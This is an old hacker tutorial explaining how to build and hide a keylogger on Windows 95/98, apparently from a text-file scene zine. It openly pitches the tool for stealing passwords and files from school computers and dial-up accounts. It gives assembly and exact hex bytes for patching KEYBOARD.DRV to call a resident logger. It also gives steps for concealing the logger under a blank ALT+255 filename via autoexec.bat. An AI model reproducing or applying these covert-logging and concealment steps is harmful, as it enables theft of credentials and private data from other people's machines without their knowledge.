((((((((((((((((((((((())))))))))))))))))))))
(( Keyloging For Winbloz 9x - By CoLdBLood ))
((((((((((((((((((((((())))))))))))))))))))))

 NOTE: This works on winbloz 95 & 98 - c that little x ?

 A while back I wos feeling the need for a keylogger for my winbloz box so i 
 decided to code one. The only problem wos that i had no winbloz compilers, so 
 i booted up pascal and let rip.

 Why do you want a keyboard logger ? For schools pc's... passwords ... internet 
 dialups... about ANYTHING can be obtained with this method... whole essays... 
 papers... *whistles* :)

 Now it may sound weird if i tell you this keylogger works in DOS and logs 
 winbloz keys right ? well not really if you think about it, for example 
 Himem.sys and Emm386.exe work very nicely in the background of windbloz so why 
 cant we have a keylogger sharing the fun ?

 If you dont want to know how it works then go strait to point 6

(((((((((((((((()))))))))))))))))
(( How it works / How to do it ))
(((((((((((((((()))))))))))))))))
   
 Well i dont wont to waist time on explaining every little freaking
 detail on how i figured it out so ill get straight to the point.

 1. Winbloz has files called .DRV files which are Device drivers. On my quest to 
    writing this app i found that this is winbloz answer to interrupts - instead
    of using interrupts it only calls int 0x30 which contains code that executes
    the correct code from these files. The file thats of intrest to us is the 
    KEYBOARD.DRV file.

 2. Now this basicly means that our normal int's like int 0x15 (keyboard) wont be 
    of mutch help in winbloz... but we do know now, how and where winbloz uses 
    the code for its keyboard...

 3. We need a plan here... We need too hook our little TSR (Terminate and Stay 
    Resident) proggie sothat it gets called everytime a key is pressed and then 
    our proggie can log... Hmm if winbloz doesnt call any other int's except 
    int 0x30 how the hell can we get the OS to call our little TSR ???

 4. We can try to debug int 0x30 but ill rather go to hell before i go through 
    such "l33t" red tape. Lets boot up soft-ice (The best tool there is for 
    debugging and cracking softwear in REAL time while the CPU is executing the 
    code) and see what we can find out about the keyboard activities in winbloz...

 5. First thing we will need to do is set up a break point on the keyboard port
    (port 0x60) ... ok break point set now we just switch back to winbloz and 
    press a key... Violla ... whot is this ? looks like we have landed smack bang
    in the middle of THE procedure winbloz uses EACH time u press a key... and 
    it look like this:

	mov	ax,0040
	mov	es,ax
	in	al,60           ; this is whot cuased the brake, this 
	mov	ah,es:[0017]	; reads from port 0x60
	cmp	al,f0
	
    yeah know thats very kewl but whot does this mean ? Well this means if we can
    hook a interrupt at bootup whitout winbloz moaning about it we can MODIFY 
    this WINBLOZ code to call our INT ! and yes i said modify and winbloz code 
    in the same sentence. Now what int can we use ? any of you know that int 0x60
    is an int that never gets used ? not even winbloz uses it so this makes it 
    perfect for too hook at runtime... Now to modify the code... the point here 
    is for the code to STILL DO EXACTLY the same thing BUT it MUST also call our 
    int 0x60. Lets take a look at the code again:

	mov	ax,0040        ; 
	mov	es,ax          ; 
	in	al,60          ; if we can put our call to int 0x60 right after
	mov	ah,es:[0017]   ; this would be ideal becoz it means winbloz does
	cmp	al,f0	       ; the work for us and we get EXACTLY whot winbloz
			       ; gets NEAT!

    now the problem is we need to insert code - which means we need to get crafty
    for a int call we only need to free up 2 bytes and we are in sooo...

        mov     ax,0040        ; this is 3 bytes big
        mov     es,ax          ; 2 byes big

    did i say we need 2 bytes ? viola

        mov	ax,0040        ; replace with  - push 40 - which is 2 bytes big
        mov     es,ax          ; replace with  - pop  es - which is 1 byte big

    this as exactly the same effect just 2 bytes smaller ! how much we need ? 2!
    so now we replace the code and insert our call to int 0x60 and viola we are 
    set !
       
	push	40
	pop	es
	in	al,60
	int	60                 ; new code added whitout effecting the code -
	mov	ah,es:[0017]       ; notice that the call is after the in al,60 ?
	cmp	al,f0


 6. There we go now all you have to do is make a copy of KEYBOARD.DRV (which is in
    your C:\windows\system dirctory) ex. KEYBOARD.DED and load the copy up in your 
    hex-editor and search for the
    following		: b840008ec0e460
    and replace it with : 6a4007e460cd60
    Then open a dos box and type: edit C:\autoexec.bat
    now on the first line hit enter sothat a blank line apears at the top of the
    file. Now hold down the ALT key and hit 255 on the key pad and then let the
    alt key go. A blank space should apear... if it doesnt, keep on doing it until
    you get a blank space... if you do get a blank space hit alt+f and press s
    to save. Now copy the keylog.exe file to your windows\system directory and
    ([ALT+255] means hold down alt and hit 255 on the keypad and let go of ALT)
    then type: ren keylog.exe [ALT+255].exe
    Then go back to winbloz and select SHUTDOWN / RESTART in DOS mode. When you
    are in REAL dos mode go to the winbloz\system directory and make a nother 
    backup of the KEYBOARD.DRV file then copy the backup file that u patched over
    the the KEYBOARD.DRV file then simply reboot. All keys will be logged to the
    windows\system directory in a file called KEYB.LOG

    NOTE: If you patched and replaced the keyboard.drv file to call INT 0x60 and 
          the keylogger is not loaded at boot time your winbloz box will crash 
          every time you press a key! Hope u know why this happens...

    Now i know most of u are saying LAMER method man but hey the source is there
    all you have to do is make it append it self to the command.com or sumthing
    similiar... Anyhowz a nother neat thing is the only why you can c this proggy
    in action is if you go into a dos box and type: /mem /c/p
    you will see somthing really weird... in the list of all the programs there 
    will be a name  "---------"  apperantly mem uses the alt+255 code to make its
    menus with - how confieniant :)
    i HAVENT seen winbloz pick this up in anyway yet so its totaly invisible
 
    So have phun kidz

    Greetz: Depach & Jamie for the phile support